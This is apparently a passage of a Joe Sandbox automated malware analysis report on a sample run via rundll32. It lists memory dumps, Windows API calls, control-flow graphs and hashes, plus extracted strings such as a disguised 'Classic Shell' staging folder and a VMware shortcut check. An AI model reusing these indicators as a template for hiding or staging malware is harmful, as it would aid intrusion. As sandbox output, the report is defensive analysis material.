                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Open$QueryValue$CloseFileModuleName
                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                    • API String ID: 2701450724-3496071916
                    • Opcode ID: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                    • Instruction ID: 05af0d7f2029f71a10c68c1639b48ed8a0d1e1dacfaf04c10325f7dc7332685a
                    • Opcode Fuzzy Hash: 2633d8292f0b00caf57c00c70ce3728d2763ece68da1b17402b5b319c40034b5
                    • Instruction Fuzzy Hash: 65610A71204BC589DB30DF71E8983DA23A5F78838CF51112A9B4D5BB5AEF78C695C348
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetUserDefaultUILanguage.KERNEL32 ref: 0041525E
                    • GetLocaleInfoW.KERNEL32 ref: 00415277
                      • Part of subcall function 00415080: FindFirstFileW.KERNEL32 ref: 004150B2
                      • Part of subcall function 00415080: FindClose.KERNEL32 ref: 004150CD
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                    • String ID:
                    • API String ID: 3216391948-0
                    • Opcode ID: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction ID: a21e750fdb81c3cb80ceca5676c95766672ab79d1740a75253142ae5867d54cb
                    • Opcode Fuzzy Hash: 3b490b7cf56bbf91dd2b89981af10d7b9414ed50fc2553a7ed94af2cd6a02d18
                    • Instruction Fuzzy Hash: A321E476210A4089DB20EF76C8917D927A0EB88BDCF50212BFB4E57B69DF38C485C784
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 164 415080-4150c8 call 40ff70 call 411140 FindFirstFileW 169 4150d2-4150ec call 40fde0 164->169 170 4150ca-4150cd FindClose 164->170 170->169
                    APIs
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction ID: 042890e011036333e5bfd1d3754174ebbb35ecdb7fac3d7a8451519e581d693b
                    • Opcode Fuzzy Hash: 9164da4fdb7a13e248c7ae70de005f26abc0b9fef4fc521832ab366a37fbd560
                    • Instruction Fuzzy Hash: E6F054622019C089CB71AF31C8952ED3710DB467ACF081336A66D4BBE5DE28C595C704
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • GetMessageW.USER32 ref: 00816038
                      • Part of subcall function 00436960: GetFileAttributesW.KERNEL32 ref: 00436979
                    • Sleep.KERNEL32 ref: 00815FC0
                    Strings
                    • C:\Program Files\Classic Shell\whq.zip, xrefs: 00816004
                    • C:\Program Files\Classic Shell, xrefs: 00815F9C, 00815FAE
                    • \VMware Workstation.lnk, xrefs: 00815F58
                    • 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F, xrefs: 00815FF1
                    • C:\Program Files\Classic Shell\cache, xrefs: 00815FC5, 00815FD7
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: AttributesFileMessageSleep
                    • String ID: 78E2EA2D09306A8E4A8449A17700DF32552EBEFB77AC3717BD2C51BE359B53EC181830EB04550D33587B2E0329D21F279182D7E2FDCD044A89361634CAF375101F$C:\Program Files\Classic Shell$C:\Program Files\Classic Shell\cache$C:\Program Files\Classic Shell\whq.zip$\VMware Workstation.lnk
                    • API String ID: 2390311571-3073936675
                    • Opcode ID: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                    • Instruction ID: 9cd3db94755c139ddff007fdf6a470e84e12c6dbf9b29939154e8315843d076e
                    • Opcode Fuzzy Hash: 129142bfb51975e8b592fb8c9b1c301ee2532256d8dbf39388386f8aeb2b2ad8
                    • Instruction Fuzzy Hash: 79317331200E05D4EB10EF72D8A13D92725FF9479CF805116FA8E976A5EF79C589C394
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • LeaveCriticalSection.KERNEL32 ref: 00414771
                    • EnterCriticalSection.KERNEL32 ref: 00414847
                    • LeaveCriticalSection.KERNEL32 ref: 00414880
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038215144.0000000000873000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038246097.000000000087D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038276865.000000000087F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.0000000000888000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038311962.000000000088C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038380046.000000000088E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038402647.0000000000892000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038436175.0000000000894000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038467761.0000000000895000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038497407.0000000000897000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038525830.000000000089A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089B000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038555591.000000000089D000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_19_2_400000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$Leave$Enter
                    • String ID:
                    • API String ID: 2978645861-0
                    • Opcode ID: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction ID: 56c173e72efaabb3100106b86f381f207646cefe1b26b91f93a20514a2ca776e
                    • Opcode Fuzzy Hash: 81552ea04b8f0d4334cc7bdf6af72e2620360f65341830c32bae4a6db5f01a9f
                    • Instruction Fuzzy Hash: 39411D65210A5088DB10EF72D4913E92722EB84B9CF85A127FB4E87AA9DF7CC5C5C358
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 113 436960-436983 call 411140 GetFileAttributesW 116 436989-436991 113->116 117 436a4e-436a56 GetLastError 113->117 120 436993-43699d 116->120 121 4369a2-4369a4 116->121 118 436a79-436a7c 117->118 119 436a58-436a5b 117->119 122 436a81-436a8d 118->122 119->118 123 436a5d-436a63 119->123 120->122 124 4369a6-4369db CreateFileW 121->124 125 4369f8-4369fe 121->125 123->118 128 436a65-436a68 123->128 124->122 129 4369e1-4369f3 CloseHandle 124->129 126 436a00-436a03 125->126 127 436a05-436a3a call 420600 125->127 126->122 134 436a49-436a4c 127->134 135 436a3c-436a47 call 420550 127->135 128->118 131 436a6a-436a6d 128->131 129->122 131->118 133 436a6f-436a72 131->133 133->118 136 436a74-436a77 133->136 134->122 135->122 136->118 137 436a7e 136->137 137->122
                    APIs
                    Memory Dump Source
                    • Source File: 00000013.00000002.4037054687.0000000000428000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000013.00000002.4037020653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037054687.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037511854.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037532425.0000000000826000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037550515.0000000000827000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037569932.000000000082D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037592517.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037612543.0000000000830000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037636218.000000000083C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037659218.000000000083D000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037683299.0000000000840000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037706260.0000000000841000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037729580.0000000000842000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037752301.0000000000843000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037779465.000000000084A000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037806065.000000000084B000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037835991.000000000084D000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037856601.000000000084F000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037888171.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037919205.0000000000852000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037948996.0000000000855000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4037980210.0000000000856000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038010016.0000000000858000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038041302.0000000000859000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038074025.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038103894.0000000000863000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038127309.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038153160.000000000086E000.00000008.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000013.00000002.4038181591.0000000000871000.00000004.00000001.01000000.00000003.sdmpDownload File
